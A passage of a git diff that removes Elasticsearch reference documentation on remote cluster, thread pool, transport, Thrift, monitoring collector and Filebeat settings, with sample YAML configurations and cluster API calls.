- -[discrete] -[[remote-cluster-sniff-settings]] -=== Sniff mode remote cluster settings - -`cluster.remote..seeds`:: - - The list of seed nodes used to sniff the remote cluster state. - -`cluster.remote..node_connections`:: - - The number of gateway nodes to connect to for this remote cluster. The default - is `3`. - -`cluster.remote.node.attr`:: - - A node attribute to filter out nodes that are eligible as a gateway node in - the remote cluster. For instance a node can have a node attribute - `node.attr.gateway: true` such that only nodes with this attribute will be - connected to if `cluster.remote.node.attr` is set to `gateway`. - -[discrete] -[[remote-cluster-proxy-settings]] -=== Proxy mode remote cluster settings - -`cluster.remote..proxy_address`:: - - The address used for all remote connections. - -`cluster.remote..proxy_socket_connections`:: - - The number of socket connections to open per remote cluster. The default is - `18`. - -[role="xpack"] -`cluster.remote..server_name`:: - - An optional hostname string which is sent in the `server_name` field of - the TLS Server Name Indication extension if - <>. The TLS transport will fail to open - remote connections if this field is not a valid hostname as defined by the - TLS SNI specification. 
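-
-Pulling the proxy mode settings above together, a statically configured proxy
-connection might look like the following sketch. The `cluster_proxy` alias, the
-addresses, and the values shown are illustrative only, and `server_name` is
-only relevant when TLS with SNI is configured for the remote connection:
-
-[source,yaml]
---------------------------------
-cluster:
-  remote:
-    cluster_proxy:
-      mode: proxy
-      proxy_address: proxy.example.com:9400
-      proxy_socket_connections: 18
-      server_name: es.example.com
-      skip_unavailable: true
---------------------------------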
diff --git a/docs/reference/modules/threadpool.asciidoc b/docs/reference/modules/threadpool.asciidoc deleted file mode 100644 index 55623741104..00000000000 --- a/docs/reference/modules/threadpool.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[modules-threadpool]] -=== Thread pools - -A node uses several thread pools to manage memory consumption. -Queues associated with many of the thread pools enable pending requests -to be held instead of discarded. - -There are several thread pools, but the important ones include: - -`generic`:: - For generic operations (for example, background node discovery). - Thread pool type is `scaling`. - -[[search-threadpool]] -`search`:: - For count/search/suggest operations. Thread pool type is - `fixed_auto_queue_size` with a size of `int((`<>`pass:[ * ]3) / 2) + 1`, and initial queue_size of - `1000`. - -[[search-throttled]]`search_throttled`:: - For count/search/suggest/get operations on `search_throttled indices`. - Thread pool type is `fixed_auto_queue_size` with a size of `1`, and initial - queue_size of `100`. - -`get`:: - For get operations. Thread pool type is `fixed` - with a size of <>, - queue_size of `1000`. - -`analyze`:: - For analyze requests. Thread pool type is `fixed` with a size of `1`, queue - size of `16`. - -`write`:: - For single-document index/delete/update and bulk requests. Thread pool type - is `fixed` with a size of <>, - queue_size of `10000`. The maximum size for this pool is - `pass:[1 + ]`<>. - -`snapshot`:: - For snapshot/restore operations. Thread pool type is `scaling` with a - keep-alive of `5m` and a max of `min(5, (`<>`) / 2)`. - -`warmer`:: - For segment warm-up operations. Thread pool type is `scaling` with a - keep-alive of `5m` and a max of `min(5, (`<>`) / 2)`. - -`refresh`:: - For refresh operations. Thread pool type is `scaling` with a - keep-alive of `5m` and a max of `min(10, (`<>`) / 2)`. - -`listener`:: - Mainly for java client executing of action when listener threaded is set to - `true`. Thread pool type is `scaling` with a default max of - `min(10, (`<>`) / 2)`. - -`fetch_shard_started`:: - For listing shard states. - Thread pool type is `scaling` with keep-alive of `5m` and a default maximum - size of `pass:[2 * ]`<>. - -`fetch_shard_store`:: - For listing shard stores. - Thread pool type is `scaling` with keep-alive of `5m` and a default maximum - size of `pass:[2 * ]`<>. - -`flush`:: - For <>, <>, and - <> `fsync` operations. Thread pool type is - `scaling` with a keep-alive of `5m` and a default maximum size of `min(5, (` - <>`) / 2)`. - -`force_merge`:: - For <> operations. - Thread pool type is `fixed` with a size of 1 and an unbounded queue size. - -`management`:: - For cluster management. - Thread pool type is `scaling` with a keep-alive of `5m` and a default - maximum size of `5`. - -`system_read`:: - For read operations on system indices. - Thread pool type is `fixed` and a default maximum size of - `min(5, (`<>`) / 2)`. - -`system_write`:: - For write operations on system indices. - Thread pool type is `fixed` and a default maximum size of - `min(5, (`<>`) / 2)`. 
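-
-Before tuning any of these pools, it often helps to look at how busy they
-currently are. One way to do that, shown here purely as an illustration, is the
-cat thread pool API:
-
-[source,console]
---------------------------------------------------
-GET /_cat/thread_pool?v=true
---------------------------------------------------
-
-The output lists each pool on each node with its active, queued, and rejected
-task counts; a steadily growing rejected count is usually the first sign that a
-pool is undersized for its workload.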
-
-Changing a specific thread pool can be done by setting its type-specific
-parameters; for example, changing the number of threads in the `write` thread
-pool:
-
-[source,yaml]
--------------------------------------------------
-thread_pool:
-    write:
-        size: 30
--------------------------------------------------
-
-[[thread-pool-types]]
-==== Thread pool types
-
-The following are the types of thread pools and their respective parameters:
-
-[[fixed-thread-pool]]
-===== `fixed`
-
-The `fixed` thread pool holds a fixed number of threads to handle requests,
-with a queue (optionally bounded) for pending requests that have no threads to
-service them.
-
-The `size` parameter controls the number of threads.
-
-The `queue_size` parameter controls the size of the queue of pending requests
-that have no threads to execute them. By default, it is set to `-1`, which
-means it is unbounded. When a request arrives and the queue is full, the
-request is rejected.
-
-[source,yaml]
--------------------------------------------------
-thread_pool:
-    write:
-        size: 30
-        queue_size: 1000
--------------------------------------------------
-
-[[fixed-auto-queue-size]]
-===== `fixed_auto_queue_size`
-
-experimental[]
-
-deprecated[7.7.0,The experimental `fixed_auto_queue_size` thread pool type is
-deprecated and will be removed in 8.0.]
-
-The `fixed_auto_queue_size` thread pool holds a fixed number of threads to
-handle requests, with a bounded queue for pending requests that have no threads
-to service them. It is similar to the `fixed` thread pool, but the `queue_size`
-adjusts automatically based on calculations derived from
-https://en.wikipedia.org/wiki/Little%27s_law[Little's Law]. These calculations
-can adjust the `queue_size` up or down by 50 each time `auto_queue_frame_size`
-operations have completed.
-
-The `size` parameter controls the number of threads.
-
-The `queue_size` parameter controls the initial size of the queue of pending
-requests that have no threads to execute them.
-
-The `min_queue_size` setting controls the minimum value to which the
-`queue_size` can be adjusted.
-
-The `max_queue_size` setting controls the maximum value to which the
-`queue_size` can be adjusted.
-
-The `auto_queue_frame_size` setting controls the number of operations during
-which measurement is taken before the queue is adjusted. It should be large
-enough that a single operation cannot unduly bias the calculation.
-
-The `target_response_time` is a time value setting that indicates the targeted
-average response time for tasks in the thread pool queue. If tasks routinely
-exceed this time, the thread pool queue is adjusted downwards so that more
-tasks are rejected.
-
-[source,yaml]
--------------------------------------------------
-thread_pool:
    search:
        size: 30
        queue_size: 500
        min_queue_size: 10
        max_queue_size: 1000
        auto_queue_frame_size: 2000
        target_response_time: 1s
--------------------------------------------------
-
-[[scaling-thread-pool]]
-===== `scaling`
-
-The `scaling` thread pool holds a dynamic number of threads. This number is
-proportional to the workload and varies between the value of the `core` and
-`max` parameters.
-
-The `keep_alive` parameter determines how long an idle thread is kept in the
-thread pool before it is removed.
- -[source,yaml] --------------------------------------------------- -thread_pool: - warmer: - core: 1 - max: 8 - keep_alive: 2m --------------------------------------------------- - -[[node.processors]] -==== Allocated processors setting - -The number of processors is automatically detected, and the thread pool settings -are automatically set based on it. In some cases it can be useful to override -the number of detected processors. This can be done by explicitly setting the -`node.processors` setting. - -[source,yaml] --------------------------------------------------- -node.processors: 2 --------------------------------------------------- - -There are a few use-cases for explicitly overriding the `node.processors` -setting: - -. If you are running multiple instances of {es} on the same host but want want -{es} to size its thread pools as if it only has a fraction of the CPU, you -should override the `node.processors` setting to the desired fraction, for -example, if you're running two instances of {es} on a 16-core machine, set -`node.processors` to 8. Note that this is an expert-level use case and there's -a lot more involved than just setting the `node.processors` setting as there are -other considerations like changing the number of garbage collector threads, -pinning processes to cores, and so on. -. Sometimes the number of processors is wrongly detected and in such cases -explicitly setting the `node.processors` setting will workaround such issues. - -In order to check the number of processors detected, use the nodes info -API with the `os` flag. diff --git a/docs/reference/modules/thrift.asciidoc b/docs/reference/modules/thrift.asciidoc deleted file mode 100644 index 1ea3f818126..00000000000 --- a/docs/reference/modules/thrift.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -[[modules-thrift]] -== Thrift - -The https://thrift.apache.org/[thrift] transport module allows to expose the REST interface of -Elasticsearch using thrift. Thrift should provide better performance -over http. Since thrift provides both the wire protocol and the -transport, it should make using Elasticsearch more efficient (though it has limited -documentation). - -Using thrift requires installing the `transport-thrift` plugin, located -https://github.com/elastic/elasticsearch-transport-thrift[here]. - -The thrift -https://github.com/elastic/elasticsearch-transport-thrift/blob/master/elasticsearch.thrift[schema] -can be used to generate thrift clients. - -[cols="<,<",options="header",] -|======================================================================= -|Setting |Description -|`thrift.port` |The port to bind to. Defaults to 9500-9600 - -|`thrift.frame` |Defaults to `-1`, which means no framing. Set to a -higher value to specify the frame size (like `15mb`). -|======================================================================= - diff --git a/docs/reference/modules/transport.asciidoc b/docs/reference/modules/transport.asciidoc deleted file mode 100644 index c40ae9c34b5..00000000000 --- a/docs/reference/modules/transport.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[[modules-transport]] -=== Transport - -REST clients send requests to your {es} cluster over <>, but -the node that receives a client request cannot always handle it alone and must -normally pass it on to other nodes for further processing. It does this using -the transport networking layer. 
The transport layer is used for all internal -communication between nodes within a cluster, all communication with the nodes -of a <>, and also by the -`TransportClient` in the {es} Java API. - -[[transport-settings]] -==== Transport settings - -The following settings can be configured for the internal transport that -communicates over TCP. These settings also use the common -<>. - -`transport.port`:: -(<>) -A bind port range. Defaults to `9300-9400`. - -`transport.publish_port`:: -(<>) -The port that other nodes in the cluster -should use when communicating with this node. Useful when a cluster node -is behind a proxy or firewall and the `transport.port` is not directly -addressable from the outside. Defaults to the actual port assigned via -`transport.port`. - -`transport.bind_host`:: -(<>) -The host address to bind the transport service to. Defaults to -`transport.host` (if set) or `network.bind_host`. - -`transport.publish_host`:: -(<>) -The host address to publish for nodes in the cluster to connect to. -Defaults to `transport.host` (if set) or `network.publish_host`. - -`transport.host`:: -(<>) -Used to set the `transport.bind_host` and the `transport.publish_host`. - -`transport.connect_timeout`:: -(<>) -The connect timeout for initiating a new connection (in -time setting format). Defaults to `30s`. - -`transport.compress`:: -(<>) -Set to `true` to enable compression (`DEFLATE`) between -all nodes. Defaults to `false`. - -`transport.ping_schedule`:: -(<>) -Schedule a regular application-level ping message -to ensure that transport connections between nodes are kept alive. Defaults to -`5s` in the transport client and `-1` (disabled) elsewhere. It is preferable -to correctly configure TCP keep-alives instead of using this feature, because -TCP keep-alives apply to all kinds of long-lived connections and not just to -transport connections. - -`transport.tcp.no_delay`:: -(<>) -Enable or disable the {wikipedia}/Nagle%27s_algorithm[TCP no delay] -setting. Defaults to `network.tcp.no_delay`. - -`transport.tcp.keep_alive`:: -(<>) -Configures the `SO_KEEPALIVE` option for this socket, which -determines whether it sends TCP keepalive probes. -Defaults to `network.tcp.keep_alive`. - -`transport.tcp.keep_idle`:: -(<>) -Configures the `TCP_KEEPIDLE` option for this socket, which -determines the time in seconds that a connection must be idle before -starting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle` if set, -or the system default otherwise. -This value cannot exceed `300` seconds. In cases where the system default -is higher than `300`, the value is automatically lowered to `300`. Only applicable on -Linux and macOS, and requires Java 11 or newer. - -`transport.tcp.keep_interval`:: -(<>) -Configures the `TCP_KEEPINTVL` option for this socket, -which determines the time in seconds between sending TCP keepalive probes. -Defaults to `network.tcp.keep_interval` if set, or the system default otherwise. -This value cannot exceed `300` seconds. In cases where the system default is higher than `300`, -the value is automatically lowered to `300`. Only applicable on Linux and macOS, -and requires Java 11 or newer. - -`transport.tcp.keep_count`:: -(<>) -Configures the `TCP_KEEPCNT` option for this socket, which -determines the number of unacknowledged TCP keepalive probes that may be -sent on a connection before it is dropped. Defaults to `network.tcp.keep_count` -if set, or the system default otherwise. Only applicable on Linux and macOS, and -requires Java 11 or newer. 
- -`transport.tcp.reuse_address`:: -(<>) -Should an address be reused or not. Defaults to `network.tcp.reuse_address`. - -`transport.tcp.send_buffer_size`:: -(<>) -The size of the TCP send buffer (specified with <>). -Defaults to `network.tcp.send_buffer_size`. - -`transport.tcp.receive_buffer_size`:: -(<>) -The size of the TCP receive buffer (specified with <>). -Defaults to `network.tcp.receive_buffer_size`. - -[[transport-profiles]] -===== Transport profiles - -Elasticsearch allows you to bind to multiple ports on different interfaces by -the use of transport profiles. See this example configuration - -[source,yaml] --------------- -transport.profiles.default.port: 9300-9400 -transport.profiles.default.bind_host: 10.0.0.1 -transport.profiles.client.port: 9500-9600 -transport.profiles.client.bind_host: 192.168.0.1 -transport.profiles.dmz.port: 9700-9800 -transport.profiles.dmz.bind_host: 172.16.1.2 --------------- - -The `default` profile is special. It is used as a fallback for any other -profiles, if those do not have a specific configuration setting set, and is how -this node connects to other nodes in the cluster. - -The following parameters can be configured on each transport profile, as in the -example above: - -* `port`: The port to which to bind. -* `bind_host`: The host to which to bind. -* `publish_host`: The host which is published in informational APIs. - -Profiles also support all the other transport settings specified in the -<> section, and use these as defaults. -For example, `transport.profiles.client.tcp.reuse_address` can be explicitly -configured, and defaults otherwise to `transport.tcp.reuse_address`. - -[[long-lived-connections]] -===== Long-lived idle connections - -A transport connection between two nodes is made up of a number of long-lived -TCP connections, some of which may be idle for an extended period of time. -Nonetheless, Elasticsearch requires these connections to remain open, and it -can disrupt the operation of your cluster if any inter-node connections are -closed by an external influence such as a firewall. It is important to -configure your network to preserve long-lived idle connections between -Elasticsearch nodes, for instance by leaving `tcp.keep_alive` enabled and -ensuring that the keepalive interval is shorter than any timeout that might -cause idle connections to be closed, or by setting `transport.ping_schedule` if -keepalives cannot be configured. Devices which drop connections when they reach -a certain age are a common source of problems to Elasticsearch clusters, and -must not be used. - -[[request-compression]] -===== Request compression - -By default, the `transport.compress` setting is `false` and network-level -request compression is disabled between nodes in the cluster. This default -normally makes sense for local cluster communication as compression has a -noticeable CPU cost and local clusters tend to be set up with fast network -connections between nodes. - -The `transport.compress` setting always configures local cluster request -compression and is the fallback setting for remote cluster request compression. -If you want to configure remote request compression differently than local -request compression, you can set it on a per-remote cluster basis using the -<>. - - -[[response-compression]] -===== Response compression - -The compression settings do not configure compression for responses. {es} will -compress a response if the inbound request was compressed--even when compression -is not enabled. 
Similarly, {es} will not compress a response if the inbound -request was uncompressed--even when compression is enabled. - - -[[transport-tracer]] -==== Transport tracer - -The transport layer has a dedicated tracer logger which, when activated, logs incoming and out going requests. The log can be dynamically activated -by setting the level of the `org.elasticsearch.transport.TransportService.tracer` logger to `TRACE`: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "logger.org.elasticsearch.transport.TransportService.tracer" : "TRACE" - } -} --------------------------------------------------- - -You can also control which actions will be traced, using a set of include and exclude wildcard patterns. By default every request will be traced -except for fault detection pings: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "transport.tracer.include" : "*", - "transport.tracer.exclude" : "internal:coordination/fault_detection/*" - } -} --------------------------------------------------- diff --git a/docs/reference/monitoring/collecting-monitoring-data.asciidoc b/docs/reference/monitoring/collecting-monitoring-data.asciidoc deleted file mode 100644 index e7838480143..00000000000 --- a/docs/reference/monitoring/collecting-monitoring-data.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[role="xpack"] -[testenv="gold"] -[[collecting-monitoring-data]] -== Collecting monitoring data using legacy collectors -++++ -Legacy collection methods -++++ - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -This method for collecting metrics about {es} involves sending the metrics to -the monitoring cluster by using exporters. For the recommended method, see <>. - -Advanced monitoring settings enable you to control how frequently data is -collected, configure timeouts, and set the retention period for locally-stored -monitoring indices. You can also adjust how monitoring data is displayed. - -To learn about monitoring in general, see <>. - -. Configure your cluster to collect monitoring data: - -.. Verify that the `xpack.monitoring.elasticsearch.collection.enabled` setting -is `true`, which is its default value, on each node in the cluster. -+ --- -NOTE: You can specify this setting in either the `elasticsearch.yml` on each -node or across the cluster as a dynamic cluster setting. If {es} -{security-features} are enabled, you must have `monitor` cluster privileges to -view the cluster settings and `manage` cluster privileges to change them. - -For more information, see <> and <>. --- - -.. Set the `xpack.monitoring.collection.enabled` setting to `true` on each -node in the cluster. By default, it is is disabled (`false`). -+ --- -NOTE: You can specify this setting in either the `elasticsearch.yml` on each -node or across the cluster as a dynamic cluster setting. If {es} -{security-features} are enabled, you must have `monitor` cluster privileges to -view the cluster settings and `manage` cluster privileges to change them. 
- -For example, use the following APIs to review and change this setting: - -[source,console] ----------------------------------- -GET _cluster/settings - -PUT _cluster/settings -{ - "persistent": { - "xpack.monitoring.collection.enabled": true - } -} ----------------------------------- - -Alternatively, you can enable this setting in {kib}. In the side navigation, -click *Monitoring*. If data collection is disabled, you are prompted to turn it -on. - -For more -information, see <> and <>. --- - -.. Optional: Specify which indices you want to monitor. -+ --- -By default, the monitoring agent collects data from all {es} indices. -To collect data from particular indices, configure the -`xpack.monitoring.collection.indices` setting. You can specify multiple indices -as a comma-separated list or use an index pattern to match multiple indices. For -example: - -[source,yaml] ----------------------------------- -xpack.monitoring.collection.indices: logstash-*, index1, test2 ----------------------------------- - -You can prepend `-` to explicitly exclude index names or -patterns. For example, to include all indices that start with `test` except -`test3`, you could specify `test*,-test3`. To include system indices such as -.security and .kibana, add `.*` to the list of included names. -For example `.*,test*,-test3` --- - -.. Optional: Specify how often to collect monitoring data. The default value for -the `xpack.monitoring.collection.interval` setting 10 seconds. See -<>. - -. Identify where to store monitoring data. -+ --- -By default, the data is stored on the same cluster by using a -<>. Alternatively, you can use an <> to send data to -a separate _monitoring cluster_. - -IMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the -cluster that stores the monitoring data must have at least one -<>. - -For more information about typical monitoring architectures, -see <>. --- - -. If you choose to use an `http` exporter: - -.. On the cluster that you want to monitor (often called the _production cluster_), -configure each node to send metrics to your monitoring cluster. Configure an -HTTP exporter in the `xpack.monitoring.exporters` settings in the -`elasticsearch.yml` file. For example: -+ --- -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["http://es-mon-1:9200", "http://es-mon2:9200"] --------------------------------------------------- --- - -.. If the Elastic {security-features} are enabled on the monitoring cluster, you -must provide appropriate credentials when data is shipped to the monitoring cluster: - -... Create a user on the monitoring cluster that has the -<>. -Alternatively, use the -<>. - -... Add the user ID and password settings to the HTTP exporter settings in the -`elasticsearch.yml` file on each node. + -+ --- -For example: - -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["http://es-mon-1:9200", "http://es-mon2:9200"] - auth.username: remote_monitoring_user - auth.password: YOUR_PASSWORD --------------------------------------------------- --- - -.. If you configured the monitoring cluster to use -<>, you must use the HTTPS protocol in -the `host` setting. You must also specify the trusted CA certificates that will -be used to verify the identity of the nodes in the monitoring cluster. 
- -*** To add a CA certificate to an {es} node's trusted certificates, you can -specify the location of the PEM encoded certificate with the -`certificate_authorities` setting. For example: -+ --- -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["https://es-mon1:9200", "https://es-mon2:9200"] - auth: - username: remote_monitoring_user - password: YOUR_PASSWORD - ssl: - certificate_authorities: [ "/path/to/ca.crt" ] --------------------------------------------------- --- - -*** Alternatively, you can configure trusted certificates using a truststore -(a Java Keystore file that contains the certificates). For example: -+ --- -[source,yaml] --------------------------------------------------- -xpack.monitoring.exporters: - id1: - type: http - host: ["https://es-mon1:9200", "https://es-mon2:9200"] - auth: - username: remote_monitoring_user - password: YOUR_PASSWORD - ssl: - truststore.path: /path/to/file - truststore.password: password --------------------------------------------------- --- - -. Configure your cluster to route monitoring data from sources such as {kib}, -Beats, and {ls} to the monitoring cluster. For information about configuring -each product to collect and send monitoring data, see <>. - -. If you updated settings in the `elasticsearch.yml` files on your production -cluster, restart {es}. See <> and <>. -+ --- -TIP: You may want to temporarily {ref}/modules-cluster.html[disable shard -allocation] before you restart your nodes to avoid unnecessary shard -reallocation during the install process. - --- - -. Optional: -<>. - -. {kibana-ref}/monitoring-data.html[View the monitoring data in {kib}]. diff --git a/docs/reference/monitoring/collectors.asciidoc b/docs/reference/monitoring/collectors.asciidoc deleted file mode 100644 index c64915ce94e..00000000000 --- a/docs/reference/monitoring/collectors.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[es-monitoring-collectors]] -== Collectors - -[IMPORTANT] -========================= -{metricbeat} is the recommended method for collecting and shipping monitoring -data to a monitoring cluster. - -If you have previously configured legacy collection methods, you should migrate -to using {metricbeat} collection methods. Use either {metricbeat} collection or -legacy collection methods; do not use both. - -Learn more about <>. -========================= - -Collectors, as their name implies, collect things. Each collector runs once for -each collection interval to obtain data from the public APIs in {es} and {xpack} -that it chooses to monitor. When the data collection is finished, the data is -handed in bulk to the <> to be sent to the -monitoring clusters. Regardless of the number of exporters, each collector only -runs once per collection interval. - -There is only one collector per data type gathered. In other words, for any -monitoring document that is created, it comes from a single collector rather -than being merged from multiple collectors. The {es} {monitor-features} -currently have a few collectors because the goal is to minimize overlap between -them for optimal performance. - -Each collector can create zero or more monitoring documents. For example, -the `index_stats` collector collects all index statistics at the same time to -avoid many unnecessary calls. 
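-
-Those index statistics come from the same public endpoint that you can call
-yourself; a minimal illustration (not tied to any collector configuration) is:
-
-[source,console]
-----------------------------------
-GET /_stats
-----------------------------------
-
-The following table summarizes each collector and the document types it
-produces.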
- -[options="header"] -|======================= -| Collector | Data Types | Description -| Cluster Stats | `cluster_stats` -| Gathers details about the cluster state, including parts of the actual cluster -state (for example `GET /_cluster/state`) and statistics about it (for example, -`GET /_cluster/stats`). This produces a single document type. In versions prior -to X-Pack 5.5, this was actually three separate collectors that resulted in -three separate types: `cluster_stats`, `cluster_state`, and `cluster_info`. In -5.5 and later, all three are combined into `cluster_stats`. This only runs on -the _elected_ master node and the data collected (`cluster_stats`) largely -controls the UI. When this data is not present, it indicates either a -misconfiguration on the elected master node, timeouts related to the collection -of the data, or issues with storing the data. Only a single document is produced -per collection. -| Index Stats | `indices_stats`, `index_stats` -| Gathers details about the indices in the cluster, both in summary and -individually. This creates many documents that represent parts of the index -statistics output (for example, `GET /_stats`). This information only needs to -be collected once, so it is collected on the _elected_ master node. The most -common failure for this collector relates to an extreme number of indices -- and -therefore time to gather them -- resulting in timeouts. One summary -`indices_stats` document is produced per collection and one `index_stats` -document is produced per index, per collection. -| Index Recovery | `index_recovery` -| Gathers details about index recovery in the cluster. Index recovery represents -the assignment of _shards_ at the cluster level. If an index is not recovered, -it is not usable. This also corresponds to shard restoration via snapshots. This -information only needs to be collected once, so it is collected on the _elected_ -master node. The most common failure for this collector relates to an extreme -number of shards -- and therefore time to gather them -- resulting in timeouts. -This creates a single document that contains all recoveries by default, which -can be quite large, but it gives the most accurate picture of recovery in the -production cluster. -| Shards | `shards` -| Gathers details about all _allocated_ shards for all indices, particularly -including what node the shard is allocated to. This information only needs to be -collected once, so it is collected on the _elected_ master node. The collector -uses the local cluster state to get the routing table without any network -timeout issues unlike most other collectors. Each shard is represented by a -separate monitoring document. -| Jobs | `job_stats` -| Gathers details about all machine learning job statistics (for example, `GET -/_ml/anomaly_detectors/_stats`). This information only needs to be collected -once, so it is collected on the _elected_ master node. However, for the master -node to be able to perform the collection, the master node must have -`xpack.ml.enabled` set to true (default) and a license level that supports {ml}. -| Node Stats | `node_stats` -| Gathers details about the running node, such as memory utilization and CPU -usage (for example, `GET /_nodes/_local/stats`). This runs on _every_ node with -{monitor-features} enabled. One common failure results in the timeout of the node -stats request due to too many segment files. 
As a result, the collector spends -too much time waiting for the file system stats to be calculated until it -finally times out. A single `node_stats` document is created per collection. -This is collected per node to help to discover issues with nodes communicating -with each other, but not with the monitoring cluster (for example, intermittent -network issues or memory pressure). -|======================= - -The {es} {monitor-features} use a single threaded scheduler to run the -collection of {es} monitoring data by all of the appropriate collectors on each -node. This scheduler is managed locally by each node and its interval is -controlled by specifying the `xpack.monitoring.collection.interval`, which -defaults to 10 seconds (`10s`), at either the node or cluster level. - -Fundamentally, each collector works on the same principle. Per collection -interval, each collector is checked to see whether it should run and then the -appropriate collectors run. The failure of an individual collector does not -impact any other collector. - -Once collection has completed, all of the monitoring data is passed to the -exporters to route the monitoring data to the monitoring clusters. - -If gaps exist in the monitoring charts in {kib}, it is typically because either -a collector failed or the monitoring cluster did not receive the data (for -example, it was being restarted). In the event that a collector fails, a logged -error should exist on the node that attempted to perform the collection. - -NOTE: Collection is currently done serially, rather than in parallel, to avoid - extra overhead on the elected master node. The downside to this approach - is that collectors might observe a different version of the cluster state - within the same collection period. In practice, this does not make a - significant difference and running the collectors in parallel would not - prevent such a possibility. - -For more information about the configuration options for the collectors, see -<>. - -[discrete] -[[es-monitoring-stack]] -==== Collecting data from across the Elastic Stack - -{es} {monitor-features} also receive monitoring data from other parts of the -Elastic Stack. In this way, it serves as an unscheduled monitoring data -collector for the stack. - -By default, data collection is disabled. {es} monitoring data is not -collected and all monitoring data from other sources such as {kib}, Beats, and -Logstash is ignored. You must set `xpack.monitoring.collection.enabled` to `true` -to enable the collection of monitoring data. See <>. - -Once data is received, it is forwarded to the exporters -to be routed to the monitoring cluster like all monitoring data. - -WARNING: Because this stack-level "collector" lives outside of the collection -interval of {es} {monitor-features}, it is not impacted by the -`xpack.monitoring.collection.interval` setting. Therefore, data is passed to the -exporters whenever it is received. This behavior can result in indices for {kib}, -Logstash, or Beats being created somewhat unexpectedly. - -While the monitoring data is collected and processed, some production cluster -metadata is added to incoming documents. This metadata enables {kib} to link the -monitoring data to the appropriate cluster. If this linkage is unimportant to -the infrastructure that you're monitoring, it might be simpler to configure -Logstash and Beats to report monitoring data directly to the monitoring cluster. 
-This scenario also prevents the production cluster from adding extra overhead -related to monitoring data, which can be very useful when there are a large -number of Logstash nodes or Beats. - -For more information about typical monitoring architectures, see -<>. diff --git a/docs/reference/monitoring/configuring-filebeat.asciidoc b/docs/reference/monitoring/configuring-filebeat.asciidoc deleted file mode 100644 index 0331d4eab94..00000000000 --- a/docs/reference/monitoring/configuring-filebeat.asciidoc +++ /dev/null @@ -1,187 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[configuring-filebeat]] -== Collecting {es} log data with {filebeat} - -[subs="attributes"] -++++ -Collecting log data with {filebeat} -++++ - -You can use {filebeat} to monitor the {es} log files, collect log events, and -ship them to the monitoring cluster. Your recent logs are visible on the -*Monitoring* page in {kib}. - -//NOTE: The tagged regions are re-used in the Stack Overview. - -. Verify that {es} is running and that the monitoring cluster is ready to -receive data from {filebeat}. -+ --- -TIP: In production environments, we strongly recommend using a separate cluster -(referred to as the _monitoring cluster_) to store the data. Using a separate -monitoring cluster prevents production cluster outages from impacting your -ability to access your monitoring data. It also prevents monitoring activities -from impacting the performance of your production cluster. See -<>. - --- - -. Enable the collection of monitoring data on your cluster. -+ --- -include::configuring-metricbeat.asciidoc[tag=enable-collection] - -For more information, see <> and <>. --- - -. Identify which logs you want to monitor. -+ --- -The {filebeat} {es} module can handle -<>, -<>, -<>, <>, and -<>. -For more information about the location of your {es} logs, see the -<> setting. - -IMPORTANT: If there are both structured (`*.json`) and unstructured (plain text) -versions of the logs, you must use the structured logs. Otherwise, they might -not appear in the appropriate context in {kib}. - --- - -. {filebeat-ref}/filebeat-installation-configuration.html[Install {filebeat}] on the {es} -nodes that contain logs that you want to monitor. - -. Identify where to send the log data. -+ --- -// tag::output-elasticsearch[] -For example, specify {es} output information for your monitoring cluster in -the {filebeat} configuration file (`filebeat.yml`): - -[source,yaml] ----------------------------------- -output.elasticsearch: - # Array of hosts to connect to. - hosts: ["http://es-mon-1:9200", "http://es-mon2:9200"] <1> - - # Optional protocol and basic auth credentials. - #protocol: "https" - #username: "elastic" - #password: "changeme" ----------------------------------- -<1> In this example, the data is stored on a monitoring cluster with nodes -`es-mon-1` and `es-mon-2`. - -If you configured the monitoring cluster to use encrypted communications, you -must access it via HTTPS. For example, use a `hosts` setting like -`https://es-mon-1:9200`. - -IMPORTANT: The {es} {monitor-features} use ingest pipelines, therefore the -cluster that stores the monitoring data must have at least one -<>. - -If {es} {security-features} are enabled on the monitoring cluster, you must -provide a valid user ID and password so that {filebeat} can send metrics -successfully. - -For more information about these configuration options, see -{filebeat-ref}/elasticsearch-output.html[Configure the {es} output]. -// end::output-elasticsearch[] --- - -. 
Optional: Identify where to visualize the data. -+ --- -// tag::setup-kibana[] -{filebeat} provides example {kib} dashboards, visualizations and searches. To -load the dashboards into the appropriate {kib} instance, specify the -`setup.kibana` information in the {filebeat} configuration file -(`filebeat.yml`) on each node: - -[source,yaml] ----------------------------------- -setup.kibana: - host: "localhost:5601" - #username: "my_kibana_user" - #password: "YOUR_PASSWORD" ----------------------------------- - -TIP: In production environments, we strongly recommend using a dedicated {kib} -instance for your monitoring cluster. - -If {security-features} are enabled, you must provide a valid user ID and -password so that {filebeat} can connect to {kib}: - -.. Create a user on the monitoring cluster that has the -<> or equivalent -privileges. - -.. Add the `username` and `password` settings to the {es} output information in -the {filebeat} configuration file. The example shows a hard-coded password, but -you should store sensitive values in the -{filebeat-ref}/keystore.html[secrets keystore]. - -See {filebeat-ref}/setup-kibana-endpoint.html[Configure the {kib} endpoint]. - -// end::setup-kibana[] --- - -. Enable the {es} module and set up the initial {filebeat} environment on each -node. -+ --- -// tag::enable-es-module[] -For example: - -["source","sh",subs="attributes,callouts"] ----------------------------------------------------------------------- -filebeat modules enable elasticsearch -filebeat setup -e ----------------------------------------------------------------------- - -For more information, see -{filebeat-ref}/filebeat-module-elasticsearch.html[{es} module]. - -// end::enable-es-module[] --- - -. Configure the {es} module in {filebeat} on each node. -+ --- -// tag::configure-es-module[] -If the logs that you want to monitor aren't in the default location, set the -appropriate path variables in the 